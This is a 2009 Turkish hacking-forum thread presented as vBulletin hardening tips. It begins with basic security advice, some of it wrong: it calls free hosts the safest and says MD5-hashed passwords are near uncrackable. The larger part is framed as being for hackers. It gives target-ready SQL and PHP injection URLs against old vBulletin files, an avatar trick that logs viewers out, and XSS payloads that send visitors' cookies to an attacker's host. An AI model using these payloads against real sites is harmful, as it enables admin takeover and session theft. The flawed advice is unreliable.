Zoru Başarırız İmkansız Zaman Alır


Zoru Başarırız İmkansız Zaman Alır

İçeriği Üyelerin Çalışmaları İle Şekillenen Tek Forum

 
AnasayfaGirişSSSKayıt OlGiriş yap

Üye Olmalısın
Kontrol Paneli
Profiliniz
Bilgiler
Seçenekler
İmza
Avatar
Sosyal
Arkadaş ve Tanınmamış
Üye listesi
Grup
Özel Mesaj
Gelen Kutusu
ÖM Gönder

Gözlenmiş Konular
Arama
 
 

Sonuç :
 
Rechercher çıkıntı araştırma
En son konular
» 11.Sınıf Edebiyat Kitabı Tüm Cevapları
Ptsi Eyl. 27, 2010 1:43 am tarafından swordof

» Virus Maker - Kendi Virüsünüzü Hazırlayın
Paz Ocak 24, 2010 11:39 pm tarafından ÖmEr1907

» MSN İletileri
Paz Ocak 24, 2010 11:30 pm tarafından ÖmEr1907

» Yüz Değiştirme
Paz Kas. 01, 2009 8:36 pm tarafından WillyOfSooN

» Kritik Internet Explorer Güvenlik Açıkları
Perş. Eyl. 17, 2009 4:51 am tarafından ÖmEr1907

» En Popüler Programlar Türkçe ( TIKLA INDIR!!!)
Perş. Eyl. 17, 2009 1:57 am tarafından ÖmEr1907

» 7-Zip v4.64 - Final (Ücretsiz & Türkçe) indir Yükle
Perş. Eyl. 17, 2009 1:54 am tarafından ÖmEr1907

» Adobe Photoshop CS4 + Keygen + Patch
Perş. Eyl. 17, 2009 12:40 am tarafından ÖmEr1907

» Co-Admin Başvurum
Çarş. Eyl. 16, 2009 3:32 pm tarafından ÖmEr1907

» Sitemize Moderatör , Süper Moderatör ve CO-Admin Alımları Vardır
Çarş. Eyl. 16, 2009 5:26 am tarafından swordof

Tarayıcı
 Kapı
 Indeks
 Üye Listesi
 Profil
 SSS
 Arama

Paylaş | 
 

 Vbulletin Acıkları Ve Kapatma Yöntemleri.

Aşağa gitmek 
YazarMesaj
swordof
SwOrDoForum Admini
SwOrDoForum Admini
avatar

Mesaj Sayısı Mesaj Sayısı : 395
Rep Gücü Rep Gücü : 2147483647
Üyelik Seviyesi Üyelik Seviyesi : 0
Burcu Burcu : Akrep
Çin Astrolojisi Çin Astrolojisi : Horoz
Yaş Yaş : 36
Memleketi Memleketi : Dadaşlar Diyarı
Lakabı Lakabı : SwOrDoF Team Lideri
Kayıt tarihi Kayıt tarihi : 13/03/09

Rep Puanı
Başarı Puanı:
1000/1000  (1000/1000)
Seviye:
1000/1000  (1000/1000)
Güçlülük:
1000/1000  (1000/1000)

MesajKonu: Vbulletin Acıkları Ve Kapatma Yöntemleri.   Perş. Haz. 11, 2009 5:33 pm

Burada forumunuzu en yüksek güvenlik seviyesinde tutmanız için gereken
TEMEL şeyleri sıralıyorum. Eminim profesyonel Vbulletin kullanıcıları
aşağıda sıralayacaklarımı biliyorlardır ama Vbulletin’e yeni
başlayanların pek bildiklerini söyleyemeyeceğim. Tabii ki hacklenemez
diye bir şey söz konusu değil ama aşağıdaki şeyleri uygularsanız
forumunuz %80 daha güvenli olacaktır.
1-) Forumunuzu daima en yüksek sürümlere upgrade edin.

2-) Hiç bir hack ve plugin yüklemeyin (Özellikle PHP dosyalarından
değişiklik yapılanları). Tertemiz bir Vbulletini hacklemek neredeyse
imkansızdır. Oluşan açıklar genelde yaptığınız eklentilerden ve
hostunuzdan kaynaklanır.

3-) Admin ve mod kontrol panellerinin şifrelerini koruyun. Ayrıntılı (İngilizce) açıklamaya buradan ulaşabilirsiniz.

4-) Tools.php dosyasının (vB3) websitenizde bulunmadığından emin olun.
Bu dosya kesinlikle upload edilmemelidir. İşi bittikten sonra
silinmelidir.

5-) phpMyAdmin kullanıyorsanız, giriş kısmının şifrelendiğinden emin olun. Aksi taktirde herkes ulaşabilir.

6-) Herhangi bir saldırıdan sonra tüm cpanel, FTP ve admin şifrelerinizi değiştirin.

7-) Admin ve mod şifrelerinin en az 9-10 karakter olmasına, bu
karakterlerin sayı ve harflerden oluşmasına dikkat edin. Şifreleriniz
MD5 şeklinde şifrelendiği için hem harf hemde rakamla oluşan 10
karakterli bir şifrenin çözülmesi imkasız bile olabilir.

8-) FORUMUNUZDA ASLA HTML KULLANIMINA İZİN VERMEYİN.

9-) Forumunuzu kurduktan sonra install klasörünüdeki install.php ve upgrade1.php adlı dosyaları silin.

10-) Sitenizi sağlam hostlara kurun. Forumunuz ne kadar güvenli olursa
olsun hostunuz saldırı yediği zaman sizde etkileneceksiniz.

11-) Sık sık DATABASE yedeği alın. Bazı Hosting firmaları her gün yedek
alım işlemlerini gerçekleştirmektedir. Ben günde 3-4 kez yedek
alıyorum. Böylece saldırı yiyip, tablolara ve foruma herhangi bir zarar
gelirse 4-5 saatlik zararla atlatıyorum.

Ben bu işlemlerin hepsini uyguluyorum. Siteme ne saldırı geldiyse
hostun zayıflığı yüzünden geldi. O yüzden sağlam hostlar seçin. Her
zaman en güvenli hostlar FREE hostlardır.

-------->
Bu kısımı forumda daha önce yazmıştım ama bu dökümanın içinde de olması daha uygun oldu...
-------->

Vbulletin’e Karşı Yapılabilecek Saldırılar;

Not: Aslında bu kısım hacking ağırlıklı ama bir hacker gibi düşünmeden
kendinizi hackerlerden koruyamazsınız. Bu yazıyı hazırlamamın sebebi
çoğu arkadaşımızın lamerler tarafından hacklenmesidir. Ve hangi açıklar
yüzünden hacklendiklerini bilmemeleridir. Ayrıca acemilerin bazı
yerleri anlamayacaklarını tahmin ediyorum. Sormak istediğiniz yerler
olursa sorabilirsiniz.

Yazımın bundan sonraki bölümü hackerleri daha çok ilgilendiriyor J
Şimdi başlıklar halinde sizlere Vbulletinin birçok açığını anlatacağım;
[NOT: Bazı açıklar çok eski olduğu için hedef site bulmak zor olabilir]
Öncelikle SQL Enjeksiyon, RFI ve exploit açıkları ile başlıyorum;

1-) LAST.PHP Dosyasını SQL Enjeksiyona Uğratmak;

http://www.hedefsite.com/last.php?fs...TiTle,user.%20 (http://www.hedefsite.com/last.php?fs...TiTle,user.%20) %20%20%20username%20as%20lastposter%20FROM%20user, thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT %201

Hedef site yerine hedef sitenizin adresini yazın ve URL’yi browserda
çalıştırın. Eğer açık mevcutsa siteye admin olarak giriş
yapabileceksiniz.

Açık Bulunma Tarihi: 2004-11-15

2-) MISC.PHP Dosyasını PHP Enjeksiyonuna Uğratmak;

Önemli : Vbulletin 3.06 sürümü aşağısı için geçerlidir. 3.0.1’de test edilmiştir.

http://hedefsite.com/misc.php?do=page&...36;{phpinfo()}}

Hedefsite kısmına saldırı yapacağınız siteyi yazıp URL’yi browserda çalıştırın.

Açık Bulunma Tarihi: 2005-02-22

3-) Avatarların İçine Kod Gizleyerek Üyeleri Log-out etmek [ =<---3.0.7 versiyon]

header("********: ;" target="_blank">http://www.site.com/forum/login.php?logout=true";
exit;
?>

Site.com yazan yere hedef sitenin adresini yazın. Ve kodu .jpg olarak
kaydedin. Kaydetdiğiniz bu jpg’yi avatarınızı olarak upload edin. Şimdi
mesajlarınızı görüntüleyen herkes otomatik olarak logout olacaktır.

4-) Shoutbox Açığı;

Vbulletinin eklentilerinden olan Shoutbox yani chatleşme modülünde HTML
kodu aktifse yani kullanılabiliyorsa şu kodu shout [chat mesajı] olarak
gönderin.

’ onmouseover=’document.********="http://www.yönlenecekadres.com?c="+document

_________________
Sayfa başına dön Aşağa gitmek
http://swordoforum.yetkinforum.com
swordof
SwOrDoForum Admini
SwOrDoForum Admini
avatar

Mesaj Sayısı Mesaj Sayısı : 395
Rep Gücü Rep Gücü : 2147483647
Üyelik Seviyesi Üyelik Seviyesi : 0
Burcu Burcu : Akrep
Çin Astrolojisi Çin Astrolojisi : Horoz
Yaş Yaş : 36
Memleketi Memleketi : Dadaşlar Diyarı
Lakabı Lakabı : SwOrDoF Team Lideri
Kayıt tarihi Kayıt tarihi : 13/03/09

Rep Puanı
Başarı Puanı:
1000/1000  (1000/1000)
Seviye:
1000/1000  (1000/1000)
Güçlülük:
1000/1000  (1000/1000)

MesajKonu: Geri: Vbulletin Acıkları Ve Kapatma Yöntemleri.   Perş. Haz. 11, 2009 5:34 pm

12-) Calander.php Açığı;

Çok eski bir açık ama neyse yinede bilmekte fayda var

http://www.hedefsite.com/calendar.ph...etday&day=2001 (http://www.hedefsite.com/calendar.ph...etday&day=2001) -8-15&comma=“;echo%20’’;%20echo%20%60%20%6 0;die();echo“

Hedefsite.com yerine hedefsitenizi yazın, browserde çalıştırın,
Vbulletin 2.0.3 [peeh size çok eski demiştim ] sürümleri için
geçerlidir.

13-) Vbulletin 3.0.7 Cookie Çalma Açığı;

Öncelikle http://www.xxxx.com/Vbulletin_p...r_exploit4.txt (http://www.xxxxx.com/Vbulletin_p...r_exploit4.txt) adresindeki kodları psphacker.php ismiyle php dosyası olarak kaydedin. Sonra herhangi bir hosta kaydedin.

onmouseover=’********.href=
"http://www.phpdosyasınıuploadettiğinizadres.com/psphacker.php?nm=Black-code.net&re=http://www.linux-soul.net/vb/showthread.php?t=1245&id="+document

_________________
Sayfa başına dön Aşağa gitmek
http://swordoforum.yetkinforum.com
 
Vbulletin Acıkları Ve Kapatma Yöntemleri.
Sayfa başına dön 
1 sayfadaki 1 sayfası

Bu forumun müsaadesi var:Bu forumdaki mesajlara cevap veremezsiniz
Zoru Başarırız İmkansız Zaman Alır ::  :: vBulletin-
Buraya geçin: